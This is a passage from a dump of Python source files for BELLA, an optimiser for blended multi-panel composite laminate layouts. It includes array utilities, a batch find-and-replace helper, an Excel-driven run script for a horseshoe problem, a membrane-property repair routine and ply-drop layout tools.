multipanel.reduced.ind_ref]:\r\n for ind in range(elem.size // 2):\r\n if elem[ind] != elem[- ind - 1]:\r\n raise Exception('reduced_ss not symmetric')\r\n for elem in reduced_sst[0: multipanel.reduced.ind_ref]:\r\n for ind in range(n_plies_max // 2):\r\n if elem[ind] != elem[- ind - 1]:\r\n raise Exception('reduced_sst not symmetric')\r\n\r\n ## test for the partial lamination parameters\r\n reduced_lampam_test = calc_lampam(reduced_ss, constraints)\r\n if not abs(reduced_lampam - reduced_lampam_test).all() < 1e-13:\r\n raise Exception(\"\"\"\r\nbeam search does not return group lamination parameters matching\r\nthe group stacking sequences.\"\"\")\r\n\r\n ## test for the ply counts\r\n for ind_panel in range(multipanel.reduced.ind_ref):\r\n if reduced_ss[ind_panel].size \\\r\n != multipanel.reduced.n_plies_in_panels[ind_panel]:\r\n raise Exception(\"\"\"\r\nWrong ply counts in the laminate. This should not happen.\"\"\")\r\n\r\n# print_list_ss(reduced_sst)\r\n return True, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5856741666793823,
"alphanum_fraction": 0.591292142868042,
"avg_line_length": 33.70000076293945,
"blob_id": "eb50a2d68e51711e6eb6555c22a55c22fbdde339",
"content_id": "0198d4ba570e28cc8461e71e875b8bd28dd9f2bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 712,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 20,
"path": "/src/divers/edit_multiple_files.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "import os\r\nimport fnmatch\r\n\r\ndef findReplace(directory, find, replace, filePattern):\r\n for path, dirs, files in os.walk(os.path.abspath(directory)):\r\n for filename in fnmatch.filter(files, filePattern):\r\n filepath = os.path.join(path, filename)\r\n with open(filepath) as f:\r\n s = f.read()\r\n s = s.replace(find, replace)\r\n with open(filepath, \"w\") as f:\r\n f.write(s)\r\n\r\nfind = \"from src.LAYLA_V02\"\r\nreplace = \"from src.LAYLA_V02\"\r\n\r\n#findReplace(r'C:\\BELLA', find, replace, '*.py')\r\n#findReplace(r'C:\\LAYLA', find, replace, '*.py')\r\n#findReplace(r'C:\\RELAY', find, replace, '*.py')\r\nfindReplace(r'C:\\BELLA', find, replace, '*.py')"
},
{
"alpha_fraction": 0.5199508666992188,
"alphanum_fraction": 0.5537139177322388,
"avg_line_length": 29.941177368164062,
"blob_id": "7a0faaf064f83c72083c9018e435de86a91f8ef4",
"content_id": "3852abadf5ce7262e5fd241ee6a9fb8277b96945",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1629,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 51,
"path": "/src/divers/arrays.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis module contains functions for manipulating and combining Python arrays.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef max_arrays(array1, array2):\r\n \"\"\"\r\n returns an array collating the element-wise maximum values from two arrays\r\n\r\n Args:\r\n array1 (numpy array): The first array\r\n array2 (numpy array): The second array\r\n\r\n Returns:\r\n array: the element-wise maximum values of ``array1`` and ``array2``.\r\n\r\n Raises:\r\n ValueError: If the size of the arrays ```array1`` and ``array2`` are\r\n different.\r\n\r\n Examples:\r\n >>> max_arrays(np.array([1., 4., 5.]), np.array([4., 3., 5.]))\r\n array([4., 4., 5.])\r\n \"\"\"\r\n if isinstance(array1, (int, float)):\r\n array1 = np.array([array1])\r\n if isinstance(array2, (int, float)):\r\n array2 = np.array([array2])\r\n\r\n if array1.size == 1:\r\n if array2.size == 1:\r\n return np.array([max(array1[0], array2[0])], float)\r\n\r\n array1 = array1[0] * np.ones(array2.shape)\r\n return np.array([max(array1[ind], array2[ind]) \\\r\n for ind in range(array2.size)], float)\r\n\r\n if array2.size == 1:\r\n array2 = array2[0] * np.ones(array1.shape)\r\n return np.array([max(array1[ind], array2[ind]) \\\r\n for ind in range(array2.size)], float)\r\n\r\n if array1.size != array2.size:\r\n raise ValueError(\"Both arrays must have the same length.\")\r\n\r\n return np.array([max(array1[ind], array2[ind]) \\\r\n for ind in range(array2.size)], float)\r\n"
},
{
"alpha_fraction": 0.6459389328956604,
"alphanum_fraction": 0.6703569293022156,
"avg_line_length": 36.51394271850586,
"blob_id": "f5642b3f85fdd42d7219bc53d4c9e2c115e34694",
"content_id": "f94b0df68a29e1ed2875b8c09ecc961e3c1dfbb0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9665,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 251,
"path": "/run_BELLA_from_input_file_horseshoe.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript to retrieve a blended multi-panel layout based on:\r\n - a panel thickness distribution\r\n - set of lamination parameter targets for each panel\r\nThe thicknesses and lamination parameters match the targets of the horseshoe\r\nproblem and are found in input_file_horseshoe_... .xlsx.\r\ny\"\"\"\r\n\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport numpy.matlib\r\nimport random\r\nrandom.seed(0)\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.optimiser import BELLA_optimiser\r\nfrom src.divers.excel import delete_file\r\n\r\nfilename = 'input_file_horseshoe.xlsx'\r\nfilename = 'input_file_horseshoe2.xlsx'\r\nfilename_input = '/BELLA/input-files/' + filename\r\nfilename_result = ('results_BELLA_thin_' + filename).replace('input_file_', '')\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename_result)\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\ndata_constraints = pd.read_excel(filename_input, sheet_name='Constraints',\r\n header=None, index_col=0).T\r\nsym = data_constraints[\"symmetry\"].iloc[0]\r\nbal = data_constraints[\"balance\"].iloc[0]\r\noopo = data_constraints[\"out-of-plane orthotropy\"].iloc[0]\r\ndam_tol = data_constraints[\"damage tolerance\"].iloc[0]\r\ndam_tol_rule = int(data_constraints[\"dam_tol_rule\"].iloc[0])\r\ncovering = data_constraints[\"covering\"].iloc[0]\r\nn_covering = int(data_constraints[\"n_covering\"].iloc[0])\r\nrule_10_percent = data_constraints[\"10% rule\"].iloc[0]\r\nrule_10_Abdalla = data_constraints[\"10% rule applied on LPs\"].iloc[0]\r\npercent_Abdalla = float(data_constraints[\r\n \"percentage limit when rule applied on LPs\"].iloc[0])\r\npercent_0 = float(data_constraints[\"percent_0\"].iloc[0])\r\npercent_45 = float(data_constraints[\"percent_45\"].iloc[0])\r\npercent_90 = float(data_constraints[\"percent_90\"].iloc[0])\r\npercent_135 = float(data_constraints[\"percent_-45\"].iloc[0])\r\npercent_45_135 = float(data_constraints[\"percent_+-45\"].iloc[0])\r\ndiso = data_constraints[\"diso\"].iloc[0]\r\ndelta_angle = float(data_constraints[\"delta_angle\"].iloc[0])\r\ncontig = data_constraints[\"contig\"].iloc[0]\r\nn_contig = int(data_constraints[\"n_contig\"].iloc[0])\r\nset_of_angles = np.array(\r\n data_constraints[\"fibre orientations\"].iloc[0].split(\" \"), int)\r\npdl_spacing = data_constraints[\"ply drop spacing rule\"].iloc[0]\r\nmin_drop = int(data_constraints[\r\n \"minimum number of continuous plies between ply drops\"].iloc[0])\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Optimiser parameters ------------------------------------------------------\r\n\r\n## For step 2 of BELLA\r\n\r\n# Number of initial ply drops to be tested\r\nn_ini_ply_drops = 10\r\n# Minimum ply count for ply groups during ply drop layout generation\r\ngroup_size_min = 8\r\n# Desired ply count for ply groups during ply drop layout generation\r\ngroup_size_max = 12\r\n# Time limit to create a group ply-drop layout\r\ntime_limit_group_pdl = 1\r\n# Time limit to create a ply-drop layout\r\ntime_limit_all_pdls = 10\r\n\r\n## For step 3 of BELLA\r\n\r\n# Branching limit for global pruning\r\nglobal_node_limit = 100\r\n# Branching limit for local pruning\r\nlocal_node_limit = 100\r\n# Branching limit for global pruning at the last level \r\nglobal_node_limit_final = 1\r\n# Branching limit for local pruning at the last level \r\nlocal_node_limit_final = 100\r\n\r\n## For step 4.1 of BELLA\r\n\r\n# to save repair success rates\r\nsave_success_rate = True\r\n# Thickness of the reference panels\r\nn_plies_ref_panel = 1\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n## For step 4.2 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit2 = 5\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit2 = global_node_limit2\r\n\r\n## For step 4.3 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit3 = 5\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit3 = global_node_limit3\r\n\r\nparameters = Parameters(\r\n constraints=constraints,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n n_ini_ply_drops=n_ini_ply_drops,\r\n global_node_limit=global_node_limit,\r\n global_node_limit_final=global_node_limit_final,\r\n local_node_limit=local_node_limit,\r\n local_node_limit_final=local_node_limit_final,\r\n global_node_limit2=global_node_limit2,\r\n local_node_limit2=local_node_limit2,\r\n global_node_limit3=global_node_limit3,\r\n local_node_limit3=local_node_limit3,\r\n save_success_rate=save_success_rate,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n n_plies_ref_panel=n_plies_ref_panel,\r\n time_limit_group_pdl=time_limit_group_pdl,\r\n time_limit_all_pdls=time_limit_all_pdls,\r\n save_buckling=True)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\ndata_materials = pd.read_excel(filename_input, sheet_name='Materials',\r\n header=None, index_col=0).T\r\nE11 = data_materials[\"E11\"].iloc[0]\r\nE22 = data_materials[\"E22\"].iloc[0]\r\nnu12 = data_materials[\"nu12\"].iloc[0]\r\nG12 = data_materials[\"G12\"].iloc[0]\r\ndensity_area = data_materials[\"areal density\"].iloc[0]\r\nply_t = data_materials[\"ply thickness\"].iloc[0]\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\ndata_objective = pd.read_excel(filename_input, sheet_name='Objective function',\r\n header=None, index_col=0).T\r\ncoeff_10 = data_objective[\"coeff_10\"].iloc[0]\r\ncoeff_contig = data_objective[\"coeff_contig\"].iloc[0]\r\ncoeff_diso = data_objective[\"coeff_diso\"].iloc[0]\r\ncoeff_oopo = data_objective[\"coeff_oopo\"].iloc[0]\r\ncoeff_spacing = data_objective[\"coeff_spacing\"].iloc[0]\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\ndata_panels = pd.read_excel(filename_input, sheet_name='Panels')\r\n\r\nlampam_weightings_all = data_panels[[\r\n \"lampam_weightings[1]\", \"lampam_weightings[2]\", \"lampam_weightings[3]\",\r\n \"lampam_weightings[4]\", \"lampam_weightings[5]\", \"lampam_weightings[6]\",\r\n \"lampam_weightings[7]\", \"lampam_weightings[8]\", \"lampam_weightings[9]\",\r\n \"lampam_weightings[10]\", \"lampam_weightings[11]\", \"lampam_weightings[12]\"]]\r\n\r\nlampam_targets_all = data_panels[[\r\n \"lampam_target[1]\", \"lampam_target[2]\", \"lampam_target[3]\",\r\n \"lampam_target[4]\", \"lampam_target[5]\", \"lampam_target[6]\",\r\n \"lampam_target[7]\", \"lampam_target[8]\", \"lampam_target[9]\",\r\n \"lampam_target[10]\", \"lampam_target[11]\", \"lampam_target[12]\"]]\r\n\r\npanels = []\r\nfor ind_panel in range(data_panels.shape[0]):\r\n panels.append(Panel(\r\n ID=int(data_panels[\"Panel ID\"].iloc[ind_panel]),\r\n lampam_target=np.array(lampam_targets_all.iloc[ind_panel], float),\r\n lampam_weightings=np.array(lampam_weightings_all.iloc[ind_panel], float),\r\n n_plies=int(data_panels[\"Number of plies\"].iloc[ind_panel]),\r\n weighting=float(data_panels[\r\n \"Weighting in MP objective funtion\"].iloc[ind_panel]),\r\n neighbour_panels=np.array(data_panels[\r\n \"Neighbour panel IDs\"].iloc[ind_panel].split(\" \"), int),\r\n constraints=constraints,\r\n length_x=float(data_panels[\"Length_x\"].iloc[ind_panel]),\r\n length_y=float(data_panels[\"Length_y\"].iloc[ind_panel]),\r\n N_x=float(data_panels[\"N_x\"].iloc[ind_panel]),\r\n N_y=float(data_panels[\"N_y\"].iloc[ind_panel])))\r\n\r\n\r\nmultipanel = MultiPanel(panels)\r\n\r\n\r\n### Optimiser Run -------------------------------------------------------------\r\nresult = BELLA_optimiser(multipanel, parameters, obj_func_param, constraints,\r\n filename_result, materials)"
},
{
"alpha_fraction": 0.6061015725135803,
"alphanum_fraction": 0.6269550323486328,
"avg_line_length": 36.61940383911133,
"blob_id": "6a84d889f2d14b818e15677ade00b3d3eac19561",
"content_id": "a44095bb3586449dc54a9c3e0e725f0888b479d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5179,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 134,
"path": "/src/RELAY/repair_membrane_1_no_ipo_Abdalla.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- repair_membrane_1_no_ipo:\r\n repair for membrane properties only accounting for one panel when the\r\n laminate does not have to remain balanced\r\n \"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport math as ma\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.sorting import sortAccording\r\nfrom src.RELAY.repair_10_bal import calc_ind_plies\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_ply_queue\r\nfrom src.RELAY.repair_membrane_1_no_ipo import calc_objA_options_3\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_options_3\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\ndef repair_membrane_1_no_ipo_Abdalla(\r\n ss_ini, ply_queue_ini, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n modifies a stacking sequence to better converge towards the in-plane target\r\n lamination parameters. The modifications preserves the satisfaction to the\r\n 10% rule, to the balance requirements and to the damage tolerance\r\n constraints.\r\n\r\n The fibre orientations are modified one by one.\r\n\r\n INPUTS\r\n\r\n - ss_ini: partially retrieved stacking sequence\r\n - ply_queue_ini: queue of plies for innermost plies\r\n - in_plane_coeffs: coefficients in the in-plane objective function\r\n - p_A: coefficient for the proportion of the laminate thickness that can be\r\n modified during the repair for membrane properties\r\n - lampam_target: lamination parameter targets\r\n - constraints: design and manufacturing constraints\r\n \"\"\"\r\n n_plies = ss_ini.size\r\n\r\n ss = np.copy(ss_ini)\r\n ply_queue = ply_queue_ini[:]\r\n\r\n lampamA = calc_lampamA_ply_queue(ss, n_plies, ply_queue, constraints)\r\n objA = sum(in_plane_coeffs * ((lampamA - lampam_target[0:4]) ** 2))\r\n# print('objA', objA)\r\n\r\n ss_list = [np.copy(ss)]\r\n ply_queue_list = [ply_queue[:]]\r\n lampamA_list = [lampamA]\r\n objA_list = [objA]\r\n\r\n indices_1, indices_per_angle = calc_ind_plies(\r\n ss, n_plies, ply_queue, constraints, p_A)\r\n indices_to_sort = list(indices_1)\r\n indices_to_sort.insert(0, -1)\r\n# print('indices_1', list(indices_1))\r\n# print('indices_per_angle', list(indices_per_angle))\r\n# print('indices_to_sort', indices_to_sort)\r\n\r\n lampamA_options = calc_lampamA_options_3(n_plies, constraints)\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints, in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n while np.min(objA_options) + 1e-20 < objA and objA > 1e-10:\r\n # attempts at modifying a couple of angled plies\r\n ind_angle1, ind_angle2 = np.unravel_index(\r\n np.argmin(objA_options, axis=None), objA_options.shape)\r\n angle1 = constraints.set_of_angles[ind_angle1]\r\n angle2 = constraints.set_of_angles[ind_angle2]\r\n# print('test angle1', angle1, 'to angle2', angle2)\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle', indices_per_angle)\r\n\r\n # if no ply to be deleted\r\n if len(indices_per_angle[ind_angle1]) < 1:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n # attention to not break the 10% rule\r\n LPs = lampamA + lampamA_options[ind_angle2] \\\r\n - lampamA_options[ind_angle1]\r\n if calc_distance_Abdalla(LPs, constraints) > 1e-10:\r\n objA_options[ind_angle1, ind_angle2] = 1e10\r\n continue\r\n\r\n# print(angle1, ' plies changed into ', angle2, 'plies')\r\n# print('ind_angle1', ind_angle1, 'ind_angle2', ind_angle2)\r\n# print('indices_per_angle[ind_angle1]', indices_per_angle[ind_angle1])\r\n# print('indices_per_angle[ind_angle2]', indices_per_angle[ind_angle2])\r\n\r\n lampamA = LPs\r\n objA = objA_options[ind_angle1, ind_angle2]\r\n\r\n # modification of the stacking sequence\r\n ind_ply_1 = indices_per_angle[ind_angle1].pop(0)\r\n# print('ind_ply_1', ind_ply_1)\r\n\r\n if ind_ply_1 == 6666: # ply from the queue\r\n ply_queue.remove(angle1)\r\n ply_queue.append(angle2)\r\n else:\r\n ss[ind_ply_1] = angle2\r\n if constraints.sym:\r\n ss[ss.size - ind_ply_1 - 1] = ss[ind_ply_1]\r\n\r\n ss_list.insert(0, np.copy(ss))\r\n ply_queue_list.insert(0, ply_queue[:])\r\n lampamA_list.insert(0, np.copy(lampamA))\r\n objA_list.insert(0, objA)\r\n\r\n indices_per_angle[ind_angle2].append(ind_ply_1)\r\n if constraints.sym:\r\n indices_per_angle[ind_angle2].sort(reverse=True)\r\n else:\r\n sortAccording(indices_per_angle[ind_angle2], indices_to_sort)\r\n indices_per_angle[ind_angle2].reverse()\r\n\r\n# print('indices_per_angle', indices_per_angle)\r\n# print('objA', objA)\r\n if objA < 1e-10:\r\n break\r\n\r\n objA_options = calc_objA_options_3(\r\n lampamA, lampamA_options, lampam_target, constraints,\r\n in_plane_coeffs)\r\n# print('objA_options', objA_options)\r\n\r\n return ss_list, ply_queue_list, lampamA_list, objA_list\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5005147457122803,
"alphanum_fraction": 0.517758309841156,
"avg_line_length": 39.00791549682617,
"blob_id": "76a5f2a125a25d42db8e54e030bbedeeded5c834",
"content_id": "adea881c4f1b195ef578db8e93340c132f0ff994",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15542,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 379,
"path": "/src/BELLA/pdl_tools.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used to generate manufacturable ply drop layouts with guide-based\r\nblending\r\n\r\n- format_ply_drops and format_ply_drops2\r\n format the ply drop layouts\r\n\r\n- ply_drops_rules\r\n deletes the ply drop layouts that does not satisfy the ply drop guidelines\r\n\r\n- global_pdl_from_local_pdl\r\n combines group ply drop layouts to form the ply drop layouts of an entire\r\n laminate structure\r\n\r\n- input_pdl_from_sst\r\n recovers the ply drop layout based on a stacking sequence table\r\n\r\nGuidelines:\r\n1: The first two outer plies should not be stopped\r\n2: The number of ply drops should be minimal (not butt joints)\r\n3: The ply drops should be distributed as evenly as possible along the\r\n thickness of the laminates\r\n4: If this is not exactly possible the ply drops should rather be\r\n concentrated in the larger groups (because smaller groups have a\r\n smaller design space)\r\n5: Then ply drops away from the middle plane are prefered to limit fibre\r\n waviness\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing_1ss\r\n\r\n\r\ndef ply_drops_at_each_boundaries(\r\n new_pdl, n_ply_drops_unique, indices_unique, n_ply_drops):\r\n \"\"\"\r\n formats the ply drop layout:\r\n - Initially, the ply drop layout is formatted for each number of ply\r\n drops\r\n - Then, the ply drop layout is formatted for each panel boundary\r\n \"\"\"\r\n pdl = np.zeros((n_ply_drops.size, new_pdl.shape[1]), int)\r\n for line in range(pdl.shape[0]):\r\n pdl[line] = new_pdl[indices_unique[n_ply_drops[line]]]\r\n return pdl\r\n\r\n\r\ndef ply_drops_rules(\r\n pdl,\r\n min_drop,\r\n boundaries,\r\n pdl_before=None,\r\n pdl_after=None,\r\n pdl_spacing=False):\r\n \"\"\"\r\n deletes the ply drop layouts that does not satisfy the ply drop spacing and\r\n stacking rules.\r\n\r\n INPUTS\r\n\r\n - pdl: matrix of ply drop layouts of the current group\r\n - pdl_spacing to activate the ply drop spacing rule\r\n - pdl_before: matrix of ply drop layout of the previous group\r\n - pdl_after: matrix of ply drop layout of the group placed afterwards\r\n - min_drop: minimum number of continuous plies required between two block\r\n of dropped plies\r\n - boundaries: panels connectivity matrix, each row of the array stores the\r\n indices of two adjacent panels\r\n \"\"\"\r\n if pdl_before is None:\r\n pdl_before = np.ones((pdl.shape[1],1))\r\n if pdl_after is None:\r\n pdl_after = np.ones((pdl.shape[1], 1))\r\n\r\n pdl_to_keep = np.ones((pdl.shape[0],), dtype=bool)\r\n# print('pdl_before', pdl_before)\r\n# print('pdl_after', pdl_after)\r\n if pdl_spacing:\r\n for ind_pdl in range(pdl.shape[0]):\r\n for ii1, ii2 in boundaries:\r\n # stack the ply drop layouts before/current/after\r\n layout1 = np.hstack((pdl_before[ii1],\r\n pdl[ind_pdl, ii1],\r\n pdl_after[ii1]))\r\n layout2 = np.hstack((pdl_before[ii2],\r\n pdl[ind_pdl, ii2],\r\n pdl_after[ii2]))\r\n # delete plies that does not cover none of the two adjacent\r\n # panels\r\n to_keep = [layout1[ii] >= 0 \\\r\n or layout1[ii] != layout2[ii] \\\r\n for ii in range(layout1.size)]\r\n layout1 = layout1[to_keep]\r\n layout2 = layout2[to_keep]\r\n # check if the ply drop spacing rule is verified\r\n if pdl_spacing:\r\n if calc_penalty_spacing_1ss(layout1, min_drop) \\\r\n + calc_penalty_spacing_1ss(layout2, min_drop) > 0:\r\n pdl_to_keep[ind_pdl] = False\r\n break\r\n return pdl[pdl_to_keep]\r\n\r\n\r\ndef format_ply_drops(my_list, n_max):\r\n \"\"\"\r\n formats the matrix of ply drop layout 'my_list' so that each panel is\r\n described with a list of 'n_max' numbers such as for the thickest panel:\r\n pdl_final = [0, 1, 2, 3, ..., n_max - 1]\r\n and for another thinner panel:\r\n - if a ply of index in the thicker panel belongs to the thinner panel:\r\n pdl_final[index] = index\r\n - otherwise:\r\n pdl_final[index] = -1\r\n \"\"\"\r\n result = np.matlib.repmat(np.arange(n_max), len(my_list), 1)\r\n for index1, el1 in enumerate(my_list):\r\n for el2 in el1:\r\n result[index1, el2] = -1\r\n return result\r\n\r\n\r\ndef format_ply_drops2(ss):\r\n \"\"\"\r\n formats the matrix of ply drop layout 'my_list' so that each panel is\r\n described with a list of 'n_max' numbers such as for the thickest panel:\r\n pdl_final = [0, 1, 2, 3, ..., n_max - 1]\r\n and for another thinner panel:\r\n - if a ply of index in the thicker panel belongs to the thinner panel:\r\n pdl_final[index] = number of the plies stacked on the panel\r\n - otherwise:\r\n pdl_final[index] = -1\r\n \"\"\"\r\n for ind_panel in range(ss.shape[0]):\r\n index_plyLocal = 0\r\n for index_plyGlobal in range(ss.shape[1]):\r\n if ss[ind_panel, index_plyGlobal] != -1:\r\n ss[ind_panel, index_plyGlobal] = index_plyLocal\r\n index_plyLocal += 1\r\n return ss\r\n\r\n\r\ndef global_pdl_from_local_pdl(multipanel, sym, pdl_before_cummul,\r\n pdl_after_cummul=None):\r\n \"\"\"\r\n combines group ply drop layouts to form the ply drop layouts of an entire\r\n laminate structure\r\n\r\n INPUTS\r\n multipanel: multi-panel structure\r\n sym for a symmetric panel\r\n pdl_before_cummul and pdl_after_cummul: array of the ply drop layouts for\r\n the successive groups\r\n \"\"\"\r\n# print('pdl_before_cummul')\r\n# print(pdl_before_cummul[0].shape, pdl_before_cummul[1].shape)\r\n# print('pdl_after_cummul')\r\n# print(pdl_after_cummul)\r\n # assemble the pdl with -1 for ply drops and 1 for non-dropped plies\r\n pdl = [None]*(multipanel.reduced.n_panels)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n pdl[ind_panel] = np.array([], dtype=int)\r\n if sym: # for symmetric laminates\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n index_in_ss = 0\r\n for local_pdl in pdl_before_cummul:\r\n if local_pdl is not None:\r\n for index_ply \\\r\n in range(local_pdl[ind_panel].size):\r\n if local_pdl[ind_panel][index_ply] == -1:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([-1]).astype(int)))\r\n else:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([1]).astype(int)))\r\n index_in_ss += 1\r\n# if multipanel.has_middle_ply:\r\n# if multipanel.middle_ply[ind_panel]:\r\n# pdl[ind_panel] = np.hstack((\r\n# pdl[ind_panel],\r\n# np.array([1]).astype(int)))\r\n# else:\r\n# pdl[ind_panel] = np.hstack((\r\n# pdl[ind_panel],\r\n# np.array([-1]).astype(int)))\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel], np.flip(pdl[ind_panel], axis=0)))\r\n pdl = np.array(pdl)\r\n if multipanel.has_middle_ply:\r\n pdl = np.delete(pdl, np.s_[pdl.shape[1] // 2], axis=1)\r\n else: # for asymmetric laminates\r\n pdl_end = [None]*(multipanel.reduced.n_panels)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n pdl_end[ind_panel] = np.array([], dtype=int)\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n index_in_ss = 0\r\n index_in_ss_end = 1\r\n for ind_local_pdl, local_pdl in enumerate(pdl_before_cummul):\r\n if ind_local_pdl % 2 == 0 and pdl_before_cummul \\\r\n and local_pdl is not None:\r\n for index_ply in range(local_pdl[ind_panel].size):\r\n if pdl_before_cummul[\r\n ind_local_pdl][ind_panel][index_ply] == -1:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([-1]).astype(int)))\r\n else:\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel],\r\n np.array([1]).astype(int)))\r\n index_in_ss += 1\r\n elif ind_local_pdl % 2 == 1 and pdl_after_cummul \\\r\n and pdl_after_cummul[ind_local_pdl] is not None:\r\n for index_ply in range(pdl_after_cummul[\r\n ind_local_pdl][ind_panel].size)[::-1]:\r\n if pdl_after_cummul[\r\n ind_local_pdl][ind_panel][index_ply] == -1:\r\n pdl_end[ind_panel] = np.hstack((\r\n np.array([-1]).astype(int),\r\n pdl_end[ind_panel]))\r\n else:\r\n pdl_end[ind_panel] = np.hstack((\r\n np.array([1]).astype(int),\r\n pdl_end[ind_panel]))\r\n index_in_ss_end += 1\r\n pdl[ind_panel] = np.hstack((\r\n pdl[ind_panel], pdl_end[ind_panel]))\r\n pdl = np.array(pdl)\r\n# print('pdl', pdl)\r\n # value for the non-dropped plies changed to the position of the plies\r\n if sym: # for symmetric laminates\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n to_add = 0\r\n for ind_ply in range(pdl.shape[1]):\r\n if pdl[ind_panel, ind_ply] != -1:\r\n pdl[ind_panel, ind_ply] += to_add\r\n to_add += 1\r\n pdl[:, (pdl.shape[1] + 1)//2:] \\\r\n = 